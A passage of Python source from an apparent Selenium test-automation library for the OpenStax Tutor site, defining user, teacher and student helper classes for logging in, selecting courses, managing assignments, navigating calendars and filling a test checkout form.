# seconds\n CAPABILITIES = {\n 'android': DesiredCapabilities.ANDROID,\n 'chrome': DesiredCapabilities.CHROME,\n 'firefox': DesiredCapabilities.FIREFOX,\n 'headlesschrome': DesiredCapabilities.CHROME,\n 'htmlunit': DesiredCapabilities.HTMLUNIT,\n 'htmlunitwithjs': DesiredCapabilities.HTMLUNITWITHJS,\n 'internetexplorer': DesiredCapabilities.INTERNETEXPLORER,\n 'ipad': DesiredCapabilities.IPAD,\n 'iphone': DesiredCapabilities.IPHONE,\n 'microsoftedge': DesiredCapabilities.EDGE,\n 'opera': DesiredCapabilities.OPERA,\n 'safari': DesiredCapabilities.SAFARI,\n }\n\n def __init__(self,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n remote_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"Class constructor.\"\"\"\n if driver_type == 'saucelabs' and pasta_user is None:\n raise TypeError('A Sauce Labs user is required for remote testing')\n self.pasta = pasta_user\n self.remote_driver = remote_driver\n self.driver_type = driver_type.lower()\n if existing_driver:\n self.driver = existing_driver\n else:\n driver = driver_type if not pasta_user else 'saucelabs'\n self.driver = self.run_on(\n driver_type=driver,\n pasta_user=self.pasta,\n capabilities=capabilities)\n self.driver.implicitly_wait(wait_time)\n self.wait = WebDriverWait(self.driver, wait_time)\n self.wait_time = wait_time\n self.page = Page(self.driver, self.wait_time)\n super(Helper, self).__init__()\n\n def __enter__(self):\n \"\"\"Entry point.\"\"\"\n return self\n\n def __del__(self):\n \"\"\"Class destructor.\"\"\"\n self.delete()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"Class exitor.\"\"\"\n self.delete()\n\n def delete(self):\n \"\"\"Webdriver destructor.\"\"\"\n self.wait = None\n try:\n self.driver.quit()\n except Exception:\n pass\n\n @classmethod\n def default_capabilities(cls, browser='chrome'):\n \"\"\"Return the default browser capabilities.\"\"\"\n browser = browser.lower()\n browser = ''.join(browser.split())\n return Helper.CAPABILITIES[browser].copy()\n\n def run_on(self, driver_type, pasta_user=None, capabilities={}):\n \"\"\"Webdriver activation.\n\n driver_type (string): web browser type\n pasta_user (PastaSauce): optional API access for saucelabs\n capabilities (dict): browser settings; copy object to avoid overwrite\n Defaults:\n DesiredCapabilities.ANDROID.copy()\n DesiredCapabilities.CHROME.copy()\n DesiredCapabilities.EDGE.copy()\n DesiredCapabilities.FIREFOX.copy()\n DesiredCapabilities.HTMLUNIT.copy()\n DesiredCapabilities.HTMLUNITWITHJS.copy()\n DesiredCapabilities.INTERNETEXPLORER.copy()\n DesiredCapabilities.IPAD.copy()\n DesiredCapabilities.IPHONE.copy()\n DesiredCapabilities.ORERA.copy()\n DesiredCapabilities.SAFARI.copy()\n Keys:\n platform\n browserName\n version\n javascriptEnabled\n wait (int): standard time, in seconds, to wait for Selenium commands\n opera_driver (string): Chromium location\n \"\"\"\n if pasta_user:\n driver = 'saucelabs'\n elif driver_type and 'chrome' not in driver_type:\n driver = driver_type\n else:\n option_set = options.Options()\n option_set.add_argument('disable-infobars')\n option_set.add_argument('disable-geolocation')\n option_set.add_experimental_option(\n 'prefs', {\n 'credentials_enable_service': False,\n 'profile': {\n 'password_manager_enabled': False\n }\n }\n )\n if 'headless' in driver_type:\n option_set.add_argument('headless')\n driver = 'headlesschrome'\n else:\n driver = 'chrome'\n try:\n return {\n 'firefox': lambda: webdriver.Firefox(),\n 'chrome': lambda: webdriver.Chrome(\n 
chrome_options=option_set),\n 'headlesschrome': lambda: webdriver.Chrome(\n chrome_options=option_set),\n 'ie': lambda: webdriver.Ie(),\n 'opera': lambda: self.start_opera(self.opera_driver),\n 'safari': lambda: webdriver.Safari(),\n 'saucelabs': lambda: webdriver.Remote(\n command_executor=(\n 'http://%s:%s@ondemand.saucelabs.com:80/wd/hub' %\n (pasta_user.get_user(), pasta_user.get_access_key())),\n desired_capabilities=capabilities),\n }[driver]()\n except WebDriverException as err:\n raise FileNotFoundError(err)\n except Exception as err:\n raise err\n\n def start_opera(self, location):\n \"\"\"Opera initiator.\"\"\"\n webdriver_service = service.Service(location)\n webdriver_service.start()\n return webdriver.Remote(\n webdriver_service.service_url,\n DesiredCapabilities.OPERA.copy()\n )\n\n def change_wait_time(self, new_wait):\n \"\"\"Change the max action wait time.\"\"\"\n if new_wait <= 0:\n raise ValueError('Wait time must be greater than zero (0).')\n self.driver.implicitly_wait(new_wait)\n self.wait = WebDriverWait(self.driver, new_wait)\n self.wait_time = new_wait\n\n def date_string(self, day_delta=0, str_format='%m/%d/%Y'):\n \"\"\"System date format pass-through.\"\"\"\n return Assignment().to_date_string(day_delta, str_format)\n\n def get(self, url):\n \"\"\"Return the current URL.\"\"\"\n self.driver.get(url)\n self.page.wait_for_page_load()\n\n def get_window_size(self, dimension=None):\n \"\"\"Return the current window dimensions.\"\"\"\n get_size = self.driver.get_window_size()\n if not dimension:\n return get_size\n if dimension not in get_size:\n raise IndexError('Unknown dimension: %s' % dimension)\n return get_size[dimension]\n\n def set_window_size(self, width=0, height=0, maximize=False):\n \"\"\"Attempt to change the browser window size.\"\"\"\n if maximize:\n self.driver.maximize_window()\n elif width >= 1 and height >= 1:\n self.driver.set_window_size(width, height)\n sleep(1.0)\n return self.get_window_size()\n\n def set_window_position(self, x_=0, y_=0):\n \"\"\"Move the browser window anchor.\"\"\"\n if x_ >= 0 and y_ >= 0:\n self.driver.set_window_position(x_, y_)\n sleep(1.0)\n\n def sleep(self, seconds=1.0):\n \"\"\"Stop execution for the specified time in seconds.\"\"\"\n sleep(seconds)\n\n def find(self, by, value):\n \"\"\"Find element.\"\"\"\n return self.driver.find_element(by=by, value=value)\n\n def find_all(self, by, value):\n \"\"\"Find elements.\"\"\"\n return self.driver.find_elements(by=by, value=value)\n\n def scroll_to(self, target):\n \"\"\"Scroll the browser window to bring the target into view.\"\"\"\n Assignment.scroll_to(self.driver, target)\n return target\n\n def url_parse(self, site):\n \"\"\"Parse the url into a valid url.\"\"\"\n parse = list(\n urlparse(\n site if urlparse(site).scheme\n else '%s%s' % ('//', site)\n )\n )\n parse[0] = b'https'\n for index, value in enumerate(parse):\n parse[index] = value.decode('utf-8') if isinstance(value, bytes) \\\n else value\n parse = ParseResult(*parse)\n return parse.geturl()\n\n\nclass User(Helper):\n \"\"\"User parent class.\"\"\"\n\n CONDENSED_WIDTH = Helper.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = Helper.DEFAULT_WAIT_TIME\n\n def __init__(self,\n username,\n password,\n site='https://tutor-qa.openstax.org',\n email=None,\n email_username=None,\n email_password=None,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n opera_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"\n Base user constructor.\n\n username (string): website 
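# --- Added sketch: dict-of-lambdas driver dispatch, as in run_on() above ---
# Self-contained illustration of the selection pattern: each factory stays
# lazy until it is looked up and called. The factory values are trivial
# stand-ins for the real webdriver constructors.
factories = {
    'chrome': lambda: 'chrome-driver',
    'firefox': lambda: 'firefox-driver',
}

def make(name):
    try:
        return factories[name]()
    except KeyError:
        raise ValueError('unknown driver: %s' % name)

print(make('chrome'))  # chrome-driver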
username\n password (string): website password\n site (string): website URL\n driver_type (string): web browser type\n pasta_user (PastaSauce): optional API access for saucelabs\n capabilities (dict): browser settings; copy object to avoid overwrite\n Defaults:\n DesiredCapabilities.ANDROID.copy()\n DesiredCapabilities.CHROME.copy()\n DesiredCapabilities.EDGE.copy()\n DesiredCapabilities.FIREFOX.copy()\n DesiredCapabilities.HTMLUNIT.copy()\n DesiredCapabilities.HTMLUNITWITHJS.copy()\n DesiredCapabilities.INTERNETEXPLORER.copy()\n DesiredCapabilities.IPAD.copy()\n DesiredCapabilities.IPHONE.copy()\n DesiredCapabilities.ORERA.copy()\n DesiredCapabilities.PHANTOMJS.copy()\n DesiredCapabilities.SAFARI.copy()\n Keys:\n platform\n browserName\n version\n javascriptEnabled\n wait (int): standard time, in seconds, to wait for Selenium commands\n opera_driver (string): Chromium location\n \"\"\"\n self.username = username\n self.password = password\n self.url = self.url_parse(site)\n self.email = email\n self.email_username = email_username\n self.email_password = email_password\n self.assign = Assignment()\n self.course_dates = (None, None)\n super(User, self).__init__(driver_type=driver_type,\n capabilities=capabilities,\n pasta_user=pasta_user,\n wait_time=wait_time,\n opera_driver=opera_driver,\n existing_driver=existing_driver,\n **kwargs)\n\n def accept_contract(self):\n \"\"\"Contract acceptance for Terms of Service and the Privacy Policy.\"\"\"\n checkbox_id = 'agreement_i_agree' if 'accounts' in \\\n self.current_url() else 'i_agree'\n try:\n target = self.find(By.ID, checkbox_id)\n self.scroll_to(target)\n target.click()\n target = self.find(By.ID, 'agreement_submit')\n self.scroll_to(target)\n target.click()\n except Exception as e:\n raise e\n\n def login(self, url=None, username=None, password=None):\n \"\"\"Tutor login control.\n\n If parameters are not passed, log in using the class values.\n Branching to deal with standard or compact screen widths\n\n username (string): website username\n password (string): website password\n url (string): website URL\n \"\"\"\n username = self.username if not username else username\n password = self.password if not password else password\n url_address = self.url if not url else self.url_parse(url)\n # open the URL\n self.get(url_address)\n if 'tutor' in url_address:\n login = self.wait.until(\n expect.presence_of_element_located(\n (By.CSS_SELECTOR, '.login')\n )\n )\n self.scroll_to(login)\n login.click()\n self.page.wait_for_page_load()\n elif 'exercises' in url_address:\n self.find(By.LINK_TEXT, 'Sign in').click()\n self.page.wait_for_page_load()\n src = self.driver.page_source\n text_located = re.search(r'openstax', src.lower())\n self.sleep(1)\n if not text_located:\n raise LoginError('Non-OpenStax URL: %s' % self.driver.current_url)\n # enter the username and password\n self.find(By.ID, 'login_username_or_email').send_keys(username)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.find(By.ID, 'login_password').send_keys(password)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.page.wait_for_page_load()\n # check if a password change is required\n if 'reset your password' in self.driver.page_source.lower():\n try:\n self.find(By.ID, 'set_password_password') \\\n .send_keys(self.password)\n self.find(By.ID, 'set_password_password_confirmation') \\\n .send_keys(self.password)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.sleep(1)\n self.find(By.CSS_SELECTOR, '.primary').click()\n except Exception as e:\n raise e\n 
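# --- Added sketch: the explicit-wait-then-click pattern used in login() ---
# A minimal helper assuming an already-constructed selenium driver; the CSS
# selector and timeout are placeholders, and the imports mirror the ones at
# the top of this module.
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as expect
from selenium.webdriver.support.ui import WebDriverWait

def click_when_ready(driver, css, timeout=15):
    """Block up to `timeout` seconds for the element, then click it."""
    WebDriverWait(driver, timeout).until(
        expect.element_to_be_clickable((By.CSS_SELECTOR, css))
    ).click()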
self.page.wait_for_page_load()\n        source = self.driver.page_source.lower()\n        while 'terms of use' in source or 'privacy policy' in source:\n            self.accept_contract()\n            self.page.wait_for_page_load()\n            source = self.driver.page_source.lower()\n        return self\n\n    def logout(self):\n        \"\"\"Logout control.\"\"\"\n        url_address = self.current_url()\n        if 'tutor' in url_address:\n            self.tutor_logout()\n        elif 'accounts' in url_address:\n            self.accounts_logout()\n        elif 'exercises' in url_address:\n            self.exercises_logout()\n        else:\n            raise HTTPError('Not an OpenStax URL')\n\n    def current_url(self):\n        \"\"\"Return the current browser URL.\"\"\"\n        return self.driver.current_url\n\n    def goto_course_list(self):\n        \"\"\"Go to the course picker.\"\"\"\n        long_wait = WebDriverWait(self.driver, 30)\n        try:\n            long_wait.until(\n                expect.presence_of_element_located(\n                    (By.ID, 'ox-react-root-container')\n                )\n            )\n            if 'tutor' in self.current_url():\n                self.find(By.CSS_SELECTOR, '.ui-brand-logo').click()\n                self.page.wait_for_page_load()\n            else:\n                raise HTTPError('Not currently on an OpenStax Tutor webpage:' +\n                                ' %s' % self.current_url())\n        except Exception as ex:\n            raise ex\n\n    def get_course_list(self, closed=False):\n        \"\"\"Return a list of available courses.\"\"\"\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.TAG_NAME, 'h1')\n            )\n        )\n        courses = self.find_all(\n            By.CSS_SELECTOR,\n            '.my-courses-current-section .my-courses-item'\n        )\n        if len(courses) == 0:\n            print('No courses found')\n            return []\n        for position, course in enumerate(courses):\n            print('%s : \"%s\"' % (position, course.get_attribute('data-title')))\n        return courses\n\n    def open_action_menu(self):\n        \"\"\"Course action menu opener.\"\"\"\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.ID, 'actions-menu')\n            )\n        ).click()\n\n    def open_user_menu(self):\n        \"\"\"Hamburger (user) menu opener.\"\"\"\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.ID, 'user-menu')\n            )\n        ).click()\n\n    def goto_menu_item(self, item):\n        \"\"\"Go to a specific user menu item.\"\"\"\n        if item.lower() == 'my account' or item.lower() == 'log out':\n            self.open_user_menu()\n        else:\n            self.open_action_menu()\n        print('Select menu item %s' % item)\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.LINK_TEXT, item)\n            )\n        ).click()\n        self.page.wait_for_page_load()\n\n    def tutor_logout(self):\n        \"\"\"Tutor logout helper.\"\"\"\n        self.open_user_menu()\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.CSS_SELECTOR, 'input[type=submit]')\n            )\n        ).click()\n        self.page.wait_for_page_load()\n\n    def accounts_logout(self):\n        \"\"\"OS Accounts logout helper.\"\"\"\n        self.find(By.CSS_SELECTOR, '.sign-out').click()\n        self.page.wait_for_page_load()\n\n    def exercises_logout(self):\n        \"\"\"Exercises logout helper.\"\"\"\n        wait = WebDriverWait(self.driver, 3)\n        try:\n            wait.until(\n                expect.element_to_be_clickable(\n                    (By.ID, 'navbar-dropdown')\n                )\n            ).click()\n            wait.until(\n                expect.element_to_be_clickable(\n                    (By.CSS_SELECTOR, '[type=\"submit\"]')\n                )\n            ).click()\n            self.page.wait_for_page_load()\n        except NoSuchElementException:\n            # Different page, but uses the same logic and link text\n            self.find(By.CSS_SELECTOR, '[data-method]').click()\n\n    def is_modal_present(self, by, value):\n        \"\"\"Return True when an element matching the locator is present.\"\"\"\n        try:\n            self.find(by, value)\n        except Exception:\n            return False\n        return True\n\n    def close_beta_windows(self):\n        \"\"\"Close the beta windows if they show.\"\"\"\n        store_wait = self.wait_time\n        self.change_wait_time(1)\n        while self.is_modal_present(By.CLASS_NAME,\n                                    
'joyride-tooltip__button--primary'):\n            self.sleep(0.5)\n            self.find(By.CLASS_NAME, 'joyride-tooltip__button--primary') \\\n                .click()\n        try:\n            self.find(By.XPATH, '//button[span[text()=\"Submit\"]]')\n        except Exception:\n            pass\n        try:\n            self.find(By.CSS_SELECTOR, '.onboarding-nag')\n            responses = self.find_all(By.CSS_SELECTOR, '.footer .btn')\n            responses[randint(0, len(responses) - 1)].click()\n            self.find(By.CSS_SELECTOR, '.footer.got-it button').click()\n        except Exception:\n            # onboarding nag isn't shown\n            pass\n        # reset wait time\n        self.change_wait_time(store_wait)\n\n    def select_course(self, title=None, appearance=None):\n        \"\"\"Select course.\"\"\"\n        print('Select course \"%s\" / \"%s\"' % (title, appearance))\n        if 'dashboard' not in self.current_url():\n            # If not at the dashboard, try to load it\n            self.goto_course_list()\n        if 'dashboard' not in self.current_url():\n            # Only has one course and the user is at the dashboard so return\n            print('Single course; select course complete')\n            return\n        if appearance:\n            if 'sociology' in appearance.lower():\n                appearance = 'intro_sociology'\n            elif 'biology' in appearance.lower():\n                appearance = 'college_biology'\n            else:\n                appearance = 'college_physics'\n        if title:\n            uses_option = 'title'\n            course = title\n        elif appearance:\n            uses_option = 'appearance'\n            course = appearance\n        else:\n            raise LoginError('Unknown course selection \"%s\"' %\n                             (title if title else appearance), None)\n        select = self.wait.until(\n            expect.element_to_be_clickable(\n                (\n                    By.XPATH,\n                    '//div[@data-%s=\"%s\"]//a' % (uses_option, course)\n                )\n            )\n        )\n        print('Course: %s - %s' % (title if title else appearance,\n                                   select.get_attribute('href')))\n        self.close_beta_windows()\n        select.click()\n        self.page.wait_for_page_load()\n        self.close_beta_windows()\n        # agree to the terms of use; bind old_wait before the try block so\n        # the finally clause can never hit an unbound name\n        old_wait = self.wait_time\n        try:\n            self.change_wait_time(1.5)\n            self.find(By.CLASS_NAME, 'btn-primary').click()\n        except Exception:\n            pass\n        finally:\n            if old_wait != self.wait_time:\n                self.change_wait_time(old_wait)\n        return self\n\n    def view_reference_book(self):\n        \"\"\"Access the reference book.\"\"\"\n        try:\n            # try the calendar button\n            self.find(\n                By.CSS_SELECTOR,\n                '.calendar-header .view-reference-guide') \\\n                .click()\n            return\n        except Exception:\n            pass\n        # try the user menu link\n        self.goto_menu_item('Browse the Book')\n\n\nclass Teacher(User):\n    \"\"\"User extension for teachers.\"\"\"\n\n    CONDENSED_WIDTH = User.CONDENSED_WIDTH\n    DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n    def __init__(self,\n                 use_env_vars=False,\n                 existing_driver=None,\n                 driver_type='chrome',\n                 **kwargs):\n        \"\"\"Teacher initialization with User pass-through.\"\"\"\n        if use_env_vars:\n            if not kwargs:\n                kwargs = {}\n            kwargs['username'] = os.getenv('TEACHER_USER')\n            kwargs['password'] = os.getenv('TEACHER_PASSWORD')\n            kwargs['site'] = os.getenv('SERVER_URL')\n            kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n            kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n            kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n        super(Teacher, self).__init__(existing_driver=existing_driver,\n                                      driver_type=driver_type,\n                                      **kwargs)\n\n    def switch_user(self, username):\n        \"\"\"Switch username during chained actions.\"\"\"\n        self.username = username\n        return self\n\n    def add_assignment(self, assignment, args):\n        \"\"\"Add an assignment.\"\"\"\n        print('Assignment: %s' % args['title'])\n        self.goto_calendar()\n        self.assign.open_assignment_menu(self.driver)\n        self.assign.add[assignment](\n            driver=self.driver,\n            name=args['title'],\n            
description=args['description'] if 'description' in args else '',\n periods=args['periods'],\n state=args['status'],\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args\n else None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None\n )\n\n def change_assignment(self, assignment, args):\n \"\"\"Alter an existing assignment.\"\"\"\n print('Assignment: %s' % args['title'])\n self.goto_calendar()\n self.assign.edit[assignment](\n driver=self.driver,\n name=args['title'],\n description=args['description'],\n periods=args['periods'],\n state=args['status'],\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args else\n None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None,\n )\n\n def delete_assignment(self, assignment, args):\n \"\"\"Delete an existing assignment (if available).\"\"\"\n print('Assignment: %s' % args['title'])\n self.goto_calendar()\n self.assign.remove[assignment](\n driver=self.driver,\n name=args['title'],\n description=args['description'] if 'description' in args else None,\n periods=args['periods'] if 'periods' in args else None,\n state=args['status'] if 'status' in args else None,\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args else\n None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None,\n )\n\n def goto_calendar(self):\n \"\"\"Return the teacher to the calendar dashboard.\"\"\"\n if not self.current_url().endswith('/t'):\n self.goto_menu_item('Dashboard')\n self.page.wait_for_page_load()\n\n def goto_performance_forecast(self):\n \"\"\"Access the performance forecast page.\"\"\"\n self.goto_menu_item('Performance Forecast')\n timer = 0\n while timer < 10:\n try:\n print('Wait for forecast load try %s of 10' % (timer + 1))\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CLASS_NAME, 'guide-container')\n )\n )\n timer = 10\n except Exception:\n timer = timer + 1\n\n def goto_student_scores(self):\n \"\"\"Access the student scores page.\"\"\"\n self.goto_menu_item('Student Scores')\n\n def goto_course_roster(self):\n \"\"\"Access the course roster page.\"\"\"\n self.goto_menu_item('Course Roster')\n\n def goto_course_settings(self):\n \"\"\"Access the course settings page.\"\"\"\n self.goto_menu_item('Course Settings')\n\n def get_course_sections(self):\n \"\"\"Return the list of course sections currently active.\"\"\"\n if 'roster' not in self.current_url():\n self.goto_course_roster()\n try:\n self.find(By.CSS_SELECTOR, '.no-periods-message')\n return []\n except Exception:\n pass\n tabs = self.find_all(By.CSS_SELECTOR, '.nav-tabs h2')\n return [tab.get_attribute('innerHTML') for tab in tabs]\n\n def add_course_section(self, section_name):\n \"\"\"Add a section to the course.\"\"\"\n if 'roster' not in self.current_url():\n self.goto_course_roster()\n self.find(By.CSS_SELECTOR, '.add-period').click()\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CSS_SELECTOR, '.form-control')\n )\n ).send_keys(section_name)\n self.find(By.CSS_SELECTOR, '.-edit-period-confirm').click()\n\n def get_enrollment_code(self, section_name=None, random=False):\n \"\"\"Return the enrollment code for a class section.\"\"\"\n if 'settings' not in self.current_url():\n 
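# The enrollment links live on the course settings page, so navigate\n            # there before reading the read-only URL fields below.\n            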
self.goto_course_settings()\n\n        try:\n            self.find(By.CSS_SELECTOR, '.direct-links-only')\n        except Exception:\n            print('Switch board to direct access URLs')\n            direct_enrollment = self.find(By.CSS_SELECTOR, '[role=tab]')\n            if direct_enrollment.get_attribute('aria-selected') != 'true':\n                direct_enrollment.click()\n            self.find(By.CSS_SELECTOR, '.modal-footer button').click()\n\n        if section_name:\n            enrollment_url = self.find(\n                By.XPATH,\n                '//label[contains(text(), \"%s\")]/input' % section_name\n            ).get_attribute('value')\n        else:\n            enrollment_urls = self.find_all(By.CSS_SELECTOR, '[readonly]')\n            # randint is inclusive on both ends, so cap the upper bound at\n            # the last valid index\n            position = randint(0, 0 if not random else len(enrollment_urls) - 1)\n            enrollment_url = enrollment_urls[position] \\\n                .get_attribute('value')\n\n        return enrollment_url\n\n    def get_book_sections(self):\n        \"\"\"Return a list of book sections.\"\"\"\n        self.close_beta_windows()\n        sleep(1)\n        self.goto_calendar()\n        self.assign.open_assignment_menu(self.driver)\n        self.find(By.LINK_TEXT, 'Add Reading').click()\n        self.page.wait_for_page_load()\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.ID, 'reading-select')\n            )\n        ).click()\n        self.page.wait_for_page_load()\n        for chapter in \\\n                self.find_all(By.CSS_SELECTOR, 'div.chapter-heading > a'):\n            if chapter.get_attribute('aria-expanded') != 'true':\n                self.scroll_to(chapter)\n                sleep(0.25)\n                chapter.click()\n        sections = self.find_all(By.CSS_SELECTOR, '.section .chapter-section')\n        section_list = []\n        for section in sections:\n            section_list.append(section.text)\n        print('Section options: %s' % str(section_list))\n        self.goto_calendar()\n        return section_list\n\n    def get_course_begin_end(self):\n        \"\"\"Return the course start and end dates as datetime objects.\"\"\"\n        if 'course' not in self.current_url():\n            raise CourseSelectionError('No course selected')\n        self.goto_course_settings()\n        self.find(By.LINK_TEXT, 'DATES AND TIME').click()\n        course_time_periods = self.find_all(\n            By.CSS_SELECTOR,\n            '.dates-and-times div'\n        )\n        if len(course_time_periods) < 3:\n            raise CourseSelectionError(\n                'Course start and end dates not found',\n                None\n            )\n        dates = course_time_periods[1].get_attribute('innerHTML')\n        begin = dates.split('>')[3].split('<')[0]\n        end = dates.split('>')[7].split('<')[0]\n        print('Course start: \"%s\" Course end: \"%s\"' % (begin, end))\n        self.goto_calendar()\n        return (datetime.datetime.strptime(begin, '%m/%d/%Y'),\n                datetime.datetime.strptime(end, '%m/%d/%Y'))\n\n    def date_is_valid(self, date):\n        \"\"\"Return boolean if end_date >= date >= start_date.\"\"\"\n        print('Date validity check: {0} : {1}'.format(str(date), type(date)))\n        if not isinstance(date, datetime.date):\n            date = datetime.datetime.strptime(date, '%m/%d/%Y')\n        date = datetime.datetime(date.year, date.month, date.day)\n        start, end = self.get_course_begin_end()\n        delta = timedelta(0)\n        print('{0} <= {1} <= {2}'.format(str(start), str(date), str(end)))\n        if date - start == delta or end - date == delta:\n            return True\n        return date > start and date < end\n\n    def get_month_number(self, month):\n        \"\"\"Take a string month and return its numeric value.\"\"\"\n        months = {v: k for k, v in enumerate(calendar.month_name)}\n        return months[month]\n\n    def get_month_year(self):\n        \"\"\"Break a date string into a month year tuple.\"\"\"\n        calendar_heading = self.find(\n            By.CSS_SELECTOR,\n            '.calendar-header-label'\n        )\n        Assignment.scroll_to(self.driver, calendar_heading)\n        calendar_date = calendar_heading.text\n        month, year = calendar_date.split(' ')\n        return 
self.get_month_number(month), int(year)\n\n    def rotate_calendar(self, target):\n        \"\"\"Rotate the teacher calendar to a specific month and year.\"\"\"\n        cal_month, cal_year = self.get_month_year()\n        target_date = datetime.datetime.strptime(target, '%m/%d/%Y').date()\n        if cal_year == target_date.year and cal_month == target_date.month:\n            return\n        if cal_year < target_date.year or \\\n                (cal_year == target_date.year and\n                 cal_month < target_date.month):\n            arrow = 'fa-caret-right'\n        elif cal_year > target_date.year or \\\n                (cal_year == target_date.year and\n                 cal_month > target_date.month):\n            arrow = 'fa-caret-left'\n        self.find(By.CLASS_NAME, arrow).click()\n        sleep(0.2)\n        self.rotate_calendar(target)\n\n    def enable_debug_mode(self):\n        \"\"\"Enable spy mode for training wheels.\"\"\"\n        self.find(By.CLASS_NAME, 'debug-toggle-link').click()\n        sleep(1)\n        return self\n\n\nclass Student(User):\n    \"\"\"User extension for students.\"\"\"\n\n    CONDENSED_WIDTH = User.CONDENSED_WIDTH\n    DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n    def __init__(self,\n                 use_env_vars=False,\n                 existing_driver=None,\n                 driver_type='chrome',\n                 **kwargs):\n        \"\"\"Student initialization with User pass-through.\"\"\"\n        if use_env_vars:\n            if not kwargs:\n                kwargs = {}\n            kwargs['username'] = os.getenv('STUDENT_USER')\n            kwargs['password'] = os.getenv('STUDENT_PASSWORD')\n            kwargs['site'] = os.getenv('SERVER_URL')\n            kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n            kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n            kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n        super(Student, self).__init__(existing_driver=existing_driver,\n                                      driver_type=driver_type,\n                                      **kwargs)\n\n    def goto_dashboard(self):\n        \"\"\"Go to current work.\"\"\"\n        self.goto_menu_item('Dashboard')\n\n    def pay_for_student(self,\n                        street, city, state, zip_,\n                        card, exp, cvv, billing_zip):\n        \"\"\"Pay for student access.\"\"\"\n        if 'free trial for' in self.driver.page_source:\n            self.find(By.CLASS_NAME, 'btn-primary').click()\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.CSS_SELECTOR, 'div.checkout')\n            )\n        )\n        self.find(By.CSS_SELECTOR, '[name=street_address]') \\\n            .send_keys(street)\n        self.find(By.CSS_SELECTOR, '[name=city]') \\\n            .send_keys(city)\n        select = Select(self.driver.find_element_by_name('state'))\n        if len(state) == 2:\n            select.select_by_value(state.upper())\n        else:\n            select.select_by_visible_text(state.title())\n        self.find(By.CSS_SELECTOR, '[name=zip_code]') \\\n            .send_keys(zip_)\n        self.driver.switch_to.frame(\n            self.scroll_to(\n                self.find(By.ID, 'braintree-hosted-field-number')))\n        self.find(By.ID, 'credit-card-number') \\\n            .send_keys(card)\n        self.driver.switch_to.frame(\n            self.find(By.ID, 'braintree-hosted-field-expirationDate'))\n        self.find(By.ID, 'expiration') \\\n            .send_keys(exp)\n        self.driver.switch_to.frame(\n            self.find(By.ID, 'braintree-hosted-field-cvv'))\n        self.find(By.ID, 'cvv') \\\n            .send_keys(cvv)\n        self.driver.switch_to.frame(\n            self.find(By.ID, 'braintree-hosted-field-postalCode'))\n        self.find(By.ID, 'postal-code') \\\n            .send_keys(billing_zip)\n        self.driver.switch_to.default_content()\n        self.find(By.CLASS_NAME, 'purchase').click()\n        self.wait.until(\n            expect.visibility_of_element_located(\n                (By.CSS_SELECTOR, '.order-complete')\n            )\n        )\n        self.scroll_to(self.find(By.CSS_SELECTOR, 'footer button')).click()\n\n    def work_assignment(self):\n        \"\"\"Work an assignment.\"\"\"\n        if '/courses/' not in self.current_url():\n            self.find(By.XPATH, '//a[contains(@class,\"na\")]')\n        self.wait.until(\n            
expect.element_to_be_clickable(\n                (By.LINK_TEXT, 'All Past Work')\n            )\n        )\n        raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n    def goto_past_work(self):\n        \"\"\"View work for previous weeks.\"\"\"\n        self.goto_dashboard()\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.LINK_TEXT, 'All Past Work')\n            )\n        ).click()\n        self.page.wait_for_page_load()\n\n    def goto_performance_forecast(self):\n        \"\"\"View the student performance forecast.\"\"\"\n        self.goto_menu_item('Performance Forecast')\n\n    def practice(self, practice_set='weakest'):\n        \"\"\"Complete a set of up to 5 practice problems.\"\"\"\n        options = []\n        self.goto_dashboard()\n        # Wait for the student performance meters to load;\n        # staleness_of expects a WebElement, so use the locator-based\n        # invisibility check to wait for the loading indicator to clear\n        try:\n            print('Loading Performance Forecast')\n            WebDriverWait(self.driver, 60).until(\n                expect.invisibility_of_element_located(\n                    (By.CLASS_NAME, 'is-loading')\n                )\n            )\n        except Exception:\n            pass\n        finally:\n            self.sleep(2)\n        # Select a section or the weakest topic to practice\n        options.append(\n            self.wait.until(\n                expect.visibility_of_element_located(\n                    (By.CLASS_NAME, 'practice')\n                )\n            )\n        )\n        if practice_set == 'weakest':\n            options[0].click()\n            self.page.wait_for_page_load()\n        else:\n            try:\n                sections = self.find_all(\n                    By.XPATH,\n                    '//button[contains(@aria-describedby,' +\n                    '\"progress-bar-tooltip-\")]'\n                )\n                for section in sections:\n                    options.append(section)\n            except Exception:\n                pass\n            